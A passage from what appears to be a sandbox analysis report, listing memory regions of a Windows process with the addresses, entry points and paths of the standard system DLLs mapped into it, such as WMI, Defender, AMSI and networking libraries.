"c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1675 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1676 start_va = 0x7fffb4410000 end_va = 0x7fffb4453fff monitored = 0 entry_point = 0x7fffb442f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 1677 start_va = 0x7fffb4460000 end_va = 0x7fffb4476fff monitored = 0 entry_point = 0x7fffb44681c0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 1678 start_va = 0x7fffb46e0000 end_va = 0x7fffb4749fff monitored = 0 entry_point = 0x7fffb46fbb20 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1679 start_va = 0x7fffb4750000 end_va = 0x7fffb4777fff monitored = 0 entry_point = 0x7fffb4759440 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1680 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1681 start_va = 0x7fffb47a0000 end_va = 0x7fffb481cfff monitored = 0 entry_point = 0x7fffb47b5a80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1682 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1683 start_va = 0x7fffb4930000 end_va = 0x7fffb4b0dfff monitored = 0 entry_point = 0x7fffb49603e0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1684 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1685 start_va = 0x7fffb5030000 end_va = 0x7fffb528dfff monitored = 0 entry_point = 0x7fffb5098a80 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1686 start_va = 0x7fffb5ab0000 end_va = 0x7fffb5aeffff monitored = 0 entry_point = 0x7fffb5ad8030 region_type = mapped_file name = "wuuhosdeployment.dll" filename = "\\Windows\\System32\\wuuhosdeployment.dll" (normalized: "c:\\windows\\system32\\wuuhosdeployment.dll") Region: id = 1687 start_va = 0x7fffb7fd0000 end_va = 0x7fffb8113fff monitored = 0 entry_point = 0x7fffb7febfd0 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 1688 start_va = 0x7fffb8390000 end_va = 0x7fffb83e0fff monitored = 0 entry_point = 0x7fffb83a9730 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 1689 start_va = 0x7fffb8bb0000 end_va = 0x7fffb8bc7fff monitored = 0 entry_point = 0x7fffb8bb1bf0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 1690 start_va = 0x7fffb8f20000 end_va = 0x7fffb8ffefff monitored = 0 entry_point = 0x7fffb8f5edd0 region_type = mapped_file name = "appcontracts.dll" filename = "\\Windows\\System32\\AppContracts.dll" (normalized: "c:\\windows\\system32\\appcontracts.dll") Region: id = 1691 start_va = 0x7fffb9010000 end_va = 0x7fffb902ffff monitored = 0 entry_point = 0x7fffb9018480 region_type = mapped_file name = "windows.staterepositorybroker.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll") Region: id = 1692 start_va = 0x7fffb97a0000 end_va = 0x7fffb9848fff monitored = 0 entry_point = 0x7fffb97a9a00 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 1693 start_va = 0x7fffb9a00000 end_va = 0x7fffb9a58fff monitored = 0 entry_point = 0x7fffb9a0daa0 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 1694 start_va = 0x7fffb9af0000 end_va = 0x7fffb9c0cfff monitored = 0 entry_point = 0x7fffb9b0dc60 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 1695 start_va = 0x7fffb9c30000 end_va = 0x7fffb9c42fff monitored = 0 entry_point = 0x7fffb9c318a0 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\System32\\tokenbinding.dll" (normalized: "c:\\windows\\system32\\tokenbinding.dll") Region: id = 1696 start_va = 0x7fffb9c50000 end_va = 0x7fffb9dcafff monitored = 0 entry_point = 0x7fffb9c8a620 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 1697 start_va = 0x7fffb9f50000 end_va = 0x7fffb9f86fff monitored = 0 entry_point = 0x7fffb9f58c10 region_type = mapped_file name = "appextension.dll" filename = "\\Windows\\System32\\AppExtension.dll" (normalized: "c:\\windows\\system32\\appextension.dll") Region: id = 1698 start_va = 0x7fffba0a0000 end_va = 0x7fffba0b7fff monitored = 0 entry_point = 0x7fffba0a3e90 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1699 start_va = 0x7fffba0c0000 end_va = 0x7fffba0e0fff monitored = 0 entry_point = 0x7fffba0c53e0 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1700 start_va = 0x7fffba0f0000 end_va = 0x7fffba19efff monitored = 0 entry_point = 0x7fffba15f1c0 region_type = mapped_file name = "upshared.dll" filename = "\\Windows\\System32\\upshared.dll" (normalized: "c:\\windows\\system32\\upshared.dll") Region: id = 1701 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1702 start_va = 0x7fffbadd0000 end_va = 0x7fffbae0efff monitored = 0 entry_point = 0x7fffbadf7d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 1703 start_va = 0x7fffbaf10000 end_va = 0x7fffbaf2cfff monitored = 0 entry_point = 0x7fffbaf128d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1704 start_va = 0x7fffbaf60000 end_va = 0x7fffbaf74fff monitored = 0 entry_point = 0x7fffbaf62930 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1705 start_va = 0x7fffbaf80000 end_va = 0x7fffbafa7fff monitored = 0 entry_point = 0x7fffbaf82d90 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1706 start_va = 0x7fffbafb0000 end_va = 0x7fffbb009fff monitored = 0 entry_point = 0x7fffbafbb560 region_type = mapped_file name = "ncryptprov.dll" filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll") Region: id = 1707 start_va = 0x7fffbb010000 end_va = 0x7fffbb035fff monitored = 0 entry_point = 0x7fffbb0172c0 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1708 start_va = 0x7fffbb330000 end_va = 0x7fffbb523fff monitored = 0 entry_point = 0x7fffbb3b4bf0 region_type = mapped_file name = "windows.cloudstore.dll" filename = "\\Windows\\System32\\Windows.CloudStore.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.dll") Region: id = 1709 start_va = 0x7fffbb740000 end_va = 0x7fffbb758fff monitored = 0 entry_point = 0x7fffbb741870 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1710 start_va = 0x7fffbb760000 end_va = 0x7fffbb7dffff monitored = 0 entry_point = 0x7fffbb76b5b0 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 1711 start_va = 0x7fffbbc40000 end_va = 0x7fffbbf6afff monitored = 0 entry_point = 0x7fffbbcdaa20 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1712 start_va = 0x7fffbc030000 end_va = 0x7fffbc03bfff monitored = 0 entry_point = 0x7fffbc0315a0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1713 start_va = 0x7fffbc070000 end_va = 0x7fffbc09afff monitored = 0 entry_point = 0x7fffbc076c40 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 1714 start_va = 0x7fffbc110000 end_va = 0x7fffbc19efff monitored = 0 entry_point = 0x7fffbc162170 region_type = mapped_file name = "usosvc.dll" filename = "\\Windows\\System32\\usosvc.dll" (normalized: "c:\\windows\\system32\\usosvc.dll") Region: id = 1715 start_va = 0x7fffbc500000 end_va = 0x7fffbc516fff monitored = 0 entry_point = 0x7fffbc50c6a0 region_type = mapped_file name = "keepaliveprovider.dll" filename = "\\Windows\\System32\\keepaliveprovider.dll" (normalized: "c:\\windows\\system32\\keepaliveprovider.dll") Region: id = 1716 start_va = 0x7fffbc520000 end_va = 0x7fffbc537fff monitored = 0 entry_point = 0x7fffbc528250 region_type = mapped_file name = "shacctprofile.dll" filename = "\\Windows\\System32\\shacctprofile.dll" (normalized: "c:\\windows\\system32\\shacctprofile.dll") Region: id = 1717 start_va = 0x7fffbceb0000 end_va = 0x7fffbcf92fff monitored = 0 entry_point = 0x7fffbcec49e0 region_type = mapped_file name = "windows.applicationmodel.dll" filename = "\\Windows\\System32\\Windows.ApplicationModel.dll" (normalized: "c:\\windows\\system32\\windows.applicationmodel.dll") Region: id = 1718 start_va = 0x7fffbd630000 end_va = 0x7fffbd64dfff monitored = 0 entry_point = 0x7fffbd634a70 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1719 start_va = 0x7fffbd650000 end_va = 0x7fffbd672fff monitored = 0 entry_point = 0x7fffbd654e70 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1720 start_va = 0x7fffbd680000 end_va = 0x7fffbd787fff monitored = 0 entry_point = 0x7fffbd7121f0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1721 start_va = 0x7fffbd790000 end_va = 0x7fffbd82bfff monitored = 0 entry_point = 0x7fffbd7df900 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1722 start_va = 0x7fffbd830000 end_va = 0x7fffbd855fff monitored = 0 entry_point = 0x7fffbd831a90 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1723 start_va = 0x7fffbdc30000 end_va = 0x7fffbdc60fff monitored = 1 entry_point = 0x7fffbdc32ef0 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1724 start_va = 0x7fffbdc70000 end_va = 0x7fffbdccffff monitored = 0 entry_point = 0x7fffbdc729d0 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1725 start_va = 0x7fffbdcd0000 end_va = 0x7fffbdcf2fff monitored = 0 entry_point = 0x7fffbdcd20b0 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1726 start_va = 0x7fffbdd00000 end_va = 0x7fffbdd10fff monitored = 0 entry_point = 0x7fffbdd01970 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1727 start_va = 0x7fffbdd20000 end_va = 0x7fffbddfafff monitored = 0 entry_point = 0x7fffbddc4140 region_type = mapped_file name = "winsqlite3.dll" filename = "\\Windows\\System32\\winsqlite3.dll" (normalized: "c:\\windows\\system32\\winsqlite3.dll") Region: id = 1728 start_va = 0x7fffbde00000 end_va = 0x7fffbdf73fff monitored = 0 entry_point = 0x7fffbde4d6e0 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 1729 start_va = 0x7fffbdf90000 end_va = 0x7fffbe063fff monitored = 0 entry_point = 0x7fffbdfa6ff0 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1730 start_va = 0x7fffbe070000 end_va = 0x7fffbe20bfff monitored = 0 entry_point = 0x7fffbe085750 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1731 start_va = 0x7fffbe210000 end_va = 0x7fffbe250fff monitored = 0 entry_point = 0x7fffbe21b610 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1732 start_va = 0x7fffbe260000 end_va = 0x7fffbe29ffff monitored = 0 entry_point = 0x7fffbe26c990 region_type = mapped_file name = "wpnservice.dll" filename = "\\Windows\\System32\\wpnservice.dll" (normalized: "c:\\windows\\system32\\wpnservice.dll") Region: id = 1733 start_va = 0x7fffbe2d0000 end_va = 0x7fffbe320fff monitored = 0 entry_point = 0x7fffbe2d3f70 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1734 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 0 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1735 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 1736 start_va = 0x7fffbe5f0000 end_va = 0x7fffbe5f6fff monitored = 0 entry_point = 0x7fffbe5f1320 region_type = mapped_file name = "gamestreamingext.dll" filename = "\\Windows\\System32\\gamestreamingext.dll" (normalized: "c:\\windows\\system32\\gamestreamingext.dll") Region: id = 1737 start_va = 0x7fffbe600000 end_va = 0x7fffbe60afff monitored = 0 entry_point = 0x7fffbe602ab0 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 1738 start_va = 0x7fffbe650000 end_va = 0x7fffbe665fff monitored = 0 entry_point = 0x7fffbe651e80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1739 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 1740 start_va = 0x7fffbe720000 end_va = 0x7fffbe756fff monitored = 0 entry_point = 0x7fffbe73ff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1741 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 1742 start_va = 0x7fffbe850000 end_va = 0x7fffbe867fff monitored = 0 entry_point = 0x7fffbe851f50 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1743 start_va = 0x7fffbe920000 end_va = 0x7fffbe928fff monitored = 0 entry_point = 0x7fffbe9216f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1744 start_va = 0x7fffbe930000 end_va = 0x7fffbe96efff monitored = 0 entry_point = 0x7fffbe936b60 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1745 start_va = 0x7fffbebf0000 end_va = 0x7fffbec00fff monitored = 0 entry_point = 0x7fffbebf3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 1746 start_va = 0x7fffbec70000 end_va = 0x7fffbec83fff monitored = 0 entry_point = 0x7fffbec71b40 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1747 start_va = 0x7fffbec90000 end_va = 0x7fffbec98fff monitored = 0 entry_point = 0x7fffbec91e20 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1748 start_va = 0x7fffbeca0000 end_va = 0x7fffbecccfff monitored = 0 entry_point = 0x7fffbeca2480 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1749 start_va = 0x7fffbecd0000 end_va = 0x7fffbed23fff monitored = 0 entry_point = 0x7fffbecd3780 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1750 start_va = 0x7fffbed30000 end_va = 0x7fffbee21fff monitored = 0 entry_point = 0x7fffbed5a750 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1751 start_va = 0x7fffbee30000 end_va = 0x7fffbee73fff monitored = 0 entry_point = 0x7fffbee40fd0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1752 start_va = 0x7fffbf4e0000 end_va = 0x7fffbf50ffff monitored = 0 entry_point = 0x7fffbf504680 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 1753 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1754 start_va = 0x7fffbfaf0000 end_va = 0x7fffbfb6efff monitored = 0 entry_point = 0x7fffbfaf5910 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1755 start_va = 0x7fffbfbd0000 end_va = 0x7fffbfbd9fff monitored = 0 entry_point = 0x7fffbfbd14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1756 start_va = 0x7fffbfbe0000 end_va = 0x7fffbfc7cfff monitored = 0 entry_point = 0x7fffbfc14640 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1757 start_va = 0x7fffbfec0000 end_va = 0x7fffbfec7fff monitored = 0 entry_point = 0x7fffbfec1430 region_type = mapped_file name = "appinfoext.dll" filename = "\\Windows\\System32\\appinfoext.dll" (normalized: "c:\\windows\\system32\\appinfoext.dll") Region: id = 1758 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1759 start_va = 0x7fffc02e0000 end_va = 0x7fffc02f7fff monitored = 0 entry_point = 0x7fffc02e5e40 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1760 start_va = 0x7fffc0300000 end_va = 0x7fffc0316fff monitored = 0 entry_point = 0x7fffc03049b0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1761 start_va = 0x7fffc0510000 end_va = 0x7fffc057bfff monitored = 0 entry_point = 0x7fffc052ec00 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1762 start_va = 0x7fffc05a0000 end_va = 0x7fffc05b5fff monitored = 0 entry_point = 0x7fffc05a3dc0 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1763 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1764 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1765 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1766 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1767 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1768 start_va = 0x7fffc2cd0000 end_va = 0x7fffc2cfcfff monitored = 0 entry_point = 0x7fffc2cd7cd0 region_type = mapped_file name = "bcp47mrm.dll" filename = "\\Windows\\System32\\BCP47mrm.dll" (normalized: "c:\\windows\\system32\\bcp47mrm.dll") Region: id = 1769 start_va = 0x7fffc2d30000 end_va = 0x7fffc2e80fff monitored = 0 entry_point = 0x7fffc2d48050 region_type = mapped_file name = "inputhost.dll" filename = "\\Windows\\System32\\InputHost.dll" (normalized: "c:\\windows\\system32\\inputhost.dll") Region: id = 1770 start_va = 0x7fffc2e90000 end_va = 0x7fffc2f8bfff monitored = 0 entry_point = 0x7fffc2ecae50 region_type = mapped_file name = "textinputframework.dll" filename = "\\Windows\\System32\\TextInputFramework.dll" (normalized: "c:\\windows\\system32\\textinputframework.dll") Region: id = 1771 start_va = 0x7fffc2f90000 end_va = 0x7fffc30dbfff monitored = 0 entry_point = 0x7fffc2fc1ac0 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 1772 start_va = 0x7fffc30e0000 end_va = 0x7fffc31d3fff monitored = 0 entry_point = 0x7fffc3121eb0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1773 start_va = 0x7fffc3550000 end_va = 0x7fffc355cfff monitored = 0 entry_point = 0x7fffc3554320 region_type = mapped_file name = "usocoreps.dll" filename = "\\Windows\\System32\\usocoreps.dll" (normalized: "c:\\windows\\system32\\usocoreps.dll") Region: id = 1774 start_va = 0x7fffc3560000 end_va = 0x7fffc3585fff monitored = 0 entry_point = 0x7fffc356ab40 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1775 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1776 start_va = 0x7fffc3690000 end_va = 0x7fffc36bdfff monitored = 0 entry_point = 0x7fffc36915f0 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1777 start_va = 0x7fffc36c0000 end_va = 0x7fffc36eefff monitored = 0 entry_point = 0x7fffc36c81d0 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1778 start_va = 0x7fffc3770000 end_va = 0x7fffc377dfff monitored = 0 entry_point = 0x7fffc3772910 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 1779 start_va = 0x7fffc3780000 end_va = 0x7fffc37e4fff monitored = 0 entry_point = 0x7fffc3793640 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1780 start_va = 0x7fffc37f0000 end_va = 0x7fffc3818fff monitored = 0 entry_point = 0x7fffc37f9320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1781 start_va = 0x7fffc3f60000 end_va = 0x7fffc3fb3fff monitored = 0 entry_point = 0x7fffc3f6dee0 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1782 start_va = 0x7fffc3fc0000 end_va = 0x7fffc40b7fff monitored = 0 entry_point = 0x7fffc3fd73e0 region_type = mapped_file name = "appxdeploymentclient.dll" filename = 